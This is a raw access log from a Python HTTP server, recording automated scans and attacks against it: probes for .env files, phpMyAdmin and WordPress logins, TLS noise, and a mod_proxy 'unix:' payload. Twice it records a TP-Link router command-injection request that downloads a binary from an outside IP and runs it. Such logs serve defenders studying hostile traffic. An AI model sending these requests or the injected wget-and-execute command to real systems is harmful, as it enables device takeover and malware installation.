HTTP/1.1" 404 - 165.154.11.121 - - [09/Apr/2024 01:52:34] code 404, message File not found 165.154.11.121 - - [09/Apr/2024 01:52:34] "GET /sitemap.xml HTTP/1.1" 404 - 109.205.213.198 - - [09/Apr/2024 02:22:04] "GET / HTTP/1.1" 200 - 66.240.205.34 - - [09/Apr/2024 02:33:56] code 400, message Bad request version ('ô') 66.240.205.34 - - [09/Apr/2024 02:33:56] "H\x00\x00\x00tj¨\x9e#D\x98+Êð§»lÅ\x19×\x8d¶\x18íJ\x1enÁùxu[lðE\x1d-jìÔxLÉrÉ\x15\x10uà%\x86Rtg\x05fv\x86]%Ì\x80\x0cèÏ®\x00µÀfÈ\x8dDÅ\x09ô" 400 - 45.148.4.14 - - [09/Apr/2024 02:41:45] code 404, message File not found 45.148.4.14 - - [09/Apr/2024 02:41:45] "GET /phpMyAdmin/index.php HTTP/1.1" 404 - 5.253.204.236 - - [09/Apr/2024 02:57:10] code 404, message File not found 5.253.204.236 - - [09/Apr/2024 02:57:10] "HEAD /.env HTTP/1.1" 404 - 202.26.144.61 - - [09/Apr/2024 02:59:24] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [09/Apr/2024 03:19:36] "GET / HTTP/1.1" 200 - 185.142.236.41 - - [09/Apr/2024 03:33:18] "GET / HTTP/1.1" 200 - 185.142.236.41 - - [09/Apr/2024 03:33:19] code 404, message File not found 185.142.236.41 - - [09/Apr/2024 03:33:19] "GET /robots.txt HTTP/1.1" 404 - 185.142.236.41 - - [09/Apr/2024 03:33:20] code 404, message File not found 185.142.236.41 - - [09/Apr/2024 03:33:20] "GET /sitemap.xml HTTP/1.1" 404 - 185.142.236.41 - - [09/Apr/2024 03:33:22] code 404, message File not found 185.142.236.41 - - [09/Apr/2024 03:33:22] "GET /.well-known/security.txt HTTP/1.1" 404 - 185.142.236.41 - - [09/Apr/2024 03:33:25] code 404, message File not found 185.142.236.41 - - [09/Apr/2024 03:33:25] "GET /favicon.ico HTTP/1.1" 404 - 87.121.69.52 - - [09/Apr/2024 03:36:20] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [09/Apr/2024 03:36:20] "CONNECT google.com:443 HTTP/1.1" 501 - 212.70.149.134 - - [09/Apr/2024 03:45:43] "GET / HTTP/1.0" 200 - 185.224.128.34 - - [09/Apr/2024 03:56:57] code 404, message File not found 185.224.128.34 - - [09/Apr/2024 03:56:57] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 146.19.24.28 - - [09/Apr/2024 04:28:34] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [09/Apr/2024 04:56:02] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 04:56:02] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 04:56:05] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 04:56:05] "POST /wp-login.php HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 04:56:08] code 404, message File not found 185.196.9.61 - - [09/Apr/2024 04:56:08] "GET /wp-admin/ HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('206.168.34.34', 53658) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 206.168.34.34 - - [09/Apr/2024 06:10:46] "GET / HTTP/1.1" 200 - 206.168.34.34 - - [09/Apr/2024 06:10:49] "GET / HTTP/1.1" 200 - 206.168.34.34 - - [09/Apr/2024 06:10:50] code 505, message Invalid HTTP version (2.0) 206.168.34.34 - - [09/Apr/2024 06:10:50] "PRI * HTTP/2.0" 505 - 206.168.34.34 - - [09/Apr/2024 06:10:50] code 404, message File not found 206.168.34.34 - - [09/Apr/2024 06:10:50] "GET /favicon.ico HTTP/1.1" 404 - 146.148.113.189 - - [09/Apr/2024 06:13:14] "GET / HTTP/1.1" 200 - 175.139.231.105 - - [09/Apr/2024 06:39:20] code 404, message File not found 175.139.231.105 - - [09/Apr/2024 06:39:20] "GET /manager/html HTTP/1.1" 404 - 185.224.128.34 - - [09/Apr/2024 06:58:45] code 404, message File not found 185.224.128.34 - - [09/Apr/2024 06:58:45] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 45.125.66.34 - - [09/Apr/2024 07:00:58] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [09/Apr/2024 07:00:58] "CONNECT google.com:443 HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 08:26:27] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 08:26:27] "POST /v1/backend1 HTTP/1.1" 501 - 185.196.9.61 - - [09/Apr/2024 08:26:30] code 404, message File not found 185.196.9.61 - - [09/Apr/2024 08:26:30] "GET /v1/2dvNUXPS5PlRdZeCWISSoRaNJey.php HTTP/1.1" 404 - 78.153.140.177 - - [09/Apr/2024 08:27:31] code 404, message File not found 78.153.140.177 - - [09/Apr/2024 08:27:31] "GET /.env HTTP/1.1" 404 - 78.153.140.177 - - [09/Apr/2024 08:27:31] code 400, message Bad request version ('o\\x8a\\x8e\\x00b\\x13\\x02\\x13\\x03\\x13\\x01À,À0À+À/̨̩\\x00£\\x00\\x9f\\x00¢\\x00\\x9e̪À¯À\\xadÀ$À(À') 78.153.140.177 - - [09/Apr/2024 08:27:31] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03üicôÕ\x85J\x01R\x8b:t¦[\x1b%O{ïgüxqßо\x9fÐ]\x04᪠-\x94sC¾Y-\x8eÏ­¦\x8aÁÖ¤GQ¬»\x84fnÀ\x15ÌK&j\x1co\x8a\x8e\x00b\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩\x00£\x00\x9f\x00¢\x00\x9e̪À¯À­À$À(À" 400 - 185.196.9.61 - - [09/Apr/2024 08:43:26] "GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://XMqII.com/ HTTP/1.1" 200 - 185.196.9.61 - - [09/Apr/2024 08:43:29] "GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA